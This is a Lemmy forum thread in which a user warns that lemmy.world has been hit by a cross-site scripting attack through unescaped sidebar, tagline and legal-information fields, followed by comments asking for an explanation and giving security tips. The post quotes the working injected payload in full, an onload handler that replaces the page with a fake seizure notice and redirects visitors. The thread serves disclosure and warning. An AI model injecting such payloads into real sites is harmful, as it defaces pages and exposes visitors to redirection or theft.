396
submitted 1 year ago* (last edited 1 year ago) by AlmightySnoo@sh.itjust.works to c/lemmy@lemmy.ml

DO NOT OPEN THE "LEGAL" PAGE


lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the "Legal" page it shows the HTML unescaped, but fortunately (for now) he's using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
you are viewing a single comment's thread
view the rest of the comments
[-] ugh@lemm.ee 19 points 1 year ago

Can someone ELI5 what this means? Do users need to be vigilant? Is information or malware being passed around? What can we expect going forward?

[-] Mookulator@wirebase.org 17 points 1 year ago* (last edited 1 year ago)

Lots of discussion happening over on kbin. It’s not clear if any user data has been stolen but some commenters are doubtful. The most important thing is we should not trust links on that site as they could be malware.

https://kbin.social/m/main@sh.itjust.works/t/168272/PSA-LEMMY-WORLD-IS-COMPROMISED/newest

[-] DrQuint@lemmy.ml 10 points 1 year ago

I think this is the perfect opportunity to plug to everyone the concept of password managers and other basic web security concepts.

[-] ugh@lemm.ee 3 points 1 year ago
this post was submitted on 10 Jul 2023
396 points (99.7% liked)

Lemmy

11948 readers
46 users here now

Everything about Lemmy; bugs, gripes, praises, and advocacy.

For discussion about the lemmy.ml instance, go to !meta@lemmy.ml.

founded 4 years ago
MODERATORS